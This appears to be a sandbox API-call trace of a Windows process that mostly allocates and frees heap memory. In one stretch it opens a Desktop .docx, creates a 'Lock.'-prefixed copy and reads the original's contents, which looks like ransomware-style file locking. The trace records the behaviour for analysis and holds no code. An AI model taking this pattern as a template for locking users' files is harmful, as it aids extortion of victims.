[0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0160.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0160.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0160.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0160.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0160.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0160.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0160.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0160.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0160.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0160.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0160.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0160.889] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.889] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.889] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.889] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/6qT95vcU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6qt95vcu.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0160.889] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.889] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0160.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0160.890] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.890] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.890] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0160.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0160.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.6qT95vcU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.6qt95vcu.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0160.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0160.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0160.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0160.891] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0160.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0160.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.892] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0160.892] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xdc6b, lpOverlapped=0x0) returned 1 [0160.894] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0160.894] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdc6b) returned 0x24d7a58 [0160.895] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0160.895] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0160.895] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0160.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0160.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0160.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdc6b) returned 0x24d7a58 [0160.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0160.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0160.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0160.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdc6b) returned 0x34b2250 [0160.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0160.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0160.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0160.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0160.899] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0160.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0160.900] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0160.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0160.900] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.900] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0160.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 